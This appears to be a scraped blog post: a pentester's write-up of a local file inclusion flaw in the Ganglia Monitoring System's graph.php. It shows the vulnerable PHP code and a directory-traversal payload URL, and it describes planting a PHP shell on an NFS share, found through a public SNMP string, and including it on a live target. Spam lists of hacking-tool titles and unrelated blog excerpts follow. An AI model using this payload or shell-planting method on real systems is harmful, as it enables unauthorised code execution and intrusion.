Accéder au contenu principal

Ganglia Monitoring System LFI

Par

Awhile back when doing a pentest I ran into an interesting web application on a server that was acting as a gateway into a juicy environment *cough*pci*cough*, the application was "Ganglia Monitoring System" http://ganglia.sourceforge.net
The scope of the test was extremely limited and it wasn't looking good....the host that was in scope had a ton of little stuff but nothing that looked like it would give me a solid foothold into the target network. After spending some time looking for obvious ways into the system I figured it would be worth looking at the Ganglia application, especially since I could find no public exploits for the app in the usual places....

First step was to build a lab up on a VM (ubuntu)
apt-get install ganglia-webfrontend

After apt was done doing its thing I went ahead and started poking around in the web front end files (/usr/share/ganglia-webfrontend). I looked to see if the application had any sort of admin functionality that I could abuse or some sort of insecure direct object reference issues. Nothing looked good. I moved on to auditing the php.

Started out with a simple grep looking for php includes that used a variable....bingo.

steponequit@steponequit-desktop:/usr/share/ganglia-webfrontend$ egrep 'include.*\$' *
class.TemplatePower.inc.php: if( isset( $this->tpl_include[ $regs[2] ]) )
class.TemplatePower.inc.php: $tpl_file = $this->tpl_include[ $regs[2] ][0];
class.TemplatePower.inc.php: $type = $this->tpl_include[ $regs[2] ][1];
class.TemplatePower.inc.php: if( isset( $this->tpl_include[ $regs[2] ]) )
class.TemplatePower.inc.php: $include_file = $this->tpl_include[ $regs[2] ][0];
class.TemplatePower.inc.php: $type = $this->tpl_include[ $regs[2] ][1];
class.TemplatePower.inc.php: $include_file = $regs[2];
class.TemplatePower.inc.php: if( !@include_once( $include_file ) )
class.TemplatePower.inc.php: $this->__errorAlert( 'TemplatePower Error: Couldn\'t include script [ '. $include_file .' ]!' );
class.TemplatePower.inc.php: $this->tpl_include["$iblockname"] = Array( $value, $type );
graph.php: include_once($graph_file);
The graph.php line jumped out at me. Looking into the file it was obvious this variable was built from user input :)
$graph = isset($_GET["g"]) ? sanitize ( $_GET["g"] ) : NULL;
....
....
....
$graph_file = "$graphdir/$graph.php";


Taking at look at the "sanitize" function I can see this shouldn't upset any file include fun

function sanitize ( $string ) {
return escapeshellcmd( clean_string( rawurldecode( $string ) ) ) ;
}

#-------------------------------------------------------------------------------
# If arg is a valid number, return it. Otherwise, return null.
function clean_number( $value )
{
return is_numeric( $value ) ? $value : null;
}
Going back to the graph.php file

$graph_file = "$graphdir/$graph.php";

if ( is_readable($graph_file) ) {
include_once($graph_file);

$graph_function = "graph_${graph}";
$graph_function($rrdtool_graph); // Pass by reference call, $rrdtool_graph modified inplace
} else {
/* Bad stuff happened. */
error_log("Tried to load graph file [$graph_file], but failed. Invalid graph, aborting.");
exit();
}

We can see here that our $graph value is inserted into the target string $graph_file with a directory on the front and a php extension on the end. The script then checks to make sure it can read the file that has been specified and finally includes it, looks good to me :).
The start of our string is defined in conf.php as "$graphdir='./graph.d'", this poses no issue as we can traverse back to the root of the file system using "../../../../../../../../". The part that does pose some annoyance is that our target file must end with ".php". So on my lab box I put a php file (phpinfo) in "/tmp" and tried including it...


Win. Not ideal, but it could work....

Going back to the real environment with this it was possible to leverage this seemingly limited vulnerability by putting a file (php shell) on the nfs server that was being used by the target server, this information was gathered from a seemingly low vuln - "public" snmp string. Once the file was placed on nfs it was only a matter of making the include call. All in a hard days work.

I have also briefly looked at the latest version of the Ganglia web front end code and it appears that this vuln still exists (graph.php)

$graph = isset($_GET["g"]) ? sanitize ( $_GET["g"] ) : "metric";
...
...
...
$php_report_file = $conf['graphdir'] . "/" . $graph . ".php";
$json_report_file = $conf['graphdir'] . "/" . $graph . ".json";
if( is_file( $php_report_file ) ) {
include_once $php_report_file;


tl;dr; wrap up - "Ganglia Monitoring System" http://ganglia.sourceforge.net contains a LFI vulnerability in the "graph.php" file. Any local php files can be included by passing its location to the "g" parameter - http://example.com/ganglia/graph.php?g=../../../../../../../tmp/shell
Related news
  1. Pentest Tools Review
  2. Kik Hack Tools
  3. New Hacker Tools
  4. Pentest Reporting Tools
  5. Hacker Search Tools
  6. Install Pentest Tools Ubuntu
  7. Pentest Tools Framework
  8. Hacker Hardware Tools
  9. Hack Website Online Tool
  10. Hacking Tools Hardware
  11. Pentest Tools For Ubuntu
  12. Pentest Tools Kali Linux
  13. Hacker Search Tools
  14. Hacker Tools Windows
  15. What Is Hacking Tools
  16. Black Hat Hacker Tools
  17. Pentest Tools List
  18. Hacker Tools
  19. Hacker Security Tools
  20. How To Install Pentest Tools In Ubuntu
  21. Android Hack Tools Github
  22. Hacking Tools For Pc

Commentaires

Enregistrer un commentaire

Posts les plus consultés de ce blog

The Muse Brooklyn

Par
http://abcirque.com http://www.amny.com/things-to-do/circus-class-at-the-muse-brooklyn-teaches-acrobatic-skills-1.13781898 https://www.instagram.com/p/Bx-D67pAxGz/ https://www.instagram.com/p/Bx7e3GFgpp2/ https://www.instagram.com/p/Bx5xpoPn_hm/ https://www.instagram.com/p/Bx40FSvj2Tf/ https://www.instagram.com/p/Bx0p224DkxE/ https://www.instagram.com/p/BxzxjhqFO1S/ https://www.instagram.com/p/BxyJmIaAeSd/ https://www.instagram.com/p/BxxweSaF6q4/ https://www.instagram.com/p/BxxSsdcAjFg/ https://www.instagram.com/p/Bxvr0SSgpPs/ https://new.mta.info/L-Project http://themusegowanus.com http://instagram.com/themusebrooklyn https://www.facebook.com/TheMuseBrooklyn/ https://twitter.com/TheMuseBrooklyn https://www.youtube.com/channel/UCkzh62AIfOI7XU3I0P6rWIQ
Enregistrer un commentaire
Lire la suite

HTML5 Games On Android

Par
On my last hollidays, I made two HTML5 games, and published on android market. Nowadays javascript has powerful libraries for doing almost everything, and also there are several compilers from java or c code to javascript, converting opengl c code to html5 canvas, but definitely, javascript execution is slower than dalvik applications, and of course much slower than arm c libs. For improving the speed of sounds and images loader, I have used javascript asynchronous execution and scheduling priority has been controlled with setTimeout/setInterval which deprioritize or priorize a code block. This games are published on the android market here: Android Planets and here: Far Planet Related news Hacker Hardware Tools Pentest Tools Port Scanner Hacker Tools For Mac Tools Used For Hacking Hacker Techniques Tools And Incident Handling Easy Hack Tools Hacking Tools Kit Hacking Tools Usb Hacker Hardware Tools Hacker Tools Hardware Hack Tools For Windows Hacking Tools For G...
Enregistrer un commentaire
Lire la suite

"Abre Las Puertas A La Inclusión": La Campaña De Donativos De ASCM Para Hacer Su Sede Más Accesible

Par
La Asociación Sociocultural ASCM lanza la campaña de recaudación de fondos: "Abre las puertas a la inclusión", con el objetivo de dotar su sede de una puerta automática.                                                       Campaña "Abre las puertas a la inclusión": Vídeo promocional.  La Asociación Sociocultural ASCM lanza, hoy, una campaña de recaudación de fondos para mejorar la accesibilidad de su sede de Ferrol y adaptarse a las medidas de seguridad y prevención que exige la nueva normalidad. "Abre las puertas a la inclusión" es el slogan de esta campaña de donativos, que se extenderá hasta el 24 de julio, y que busca la colaboración de la ciudadanía para lograr reunir los 3.599 euros necesarios para dotar su local de una puerta automática. ASCM lleva, desde su fundación en 1987, reivindicando la necesidad de pensar en clave de accesibilidad un...
Enregistrer un commentaire
Lire la suite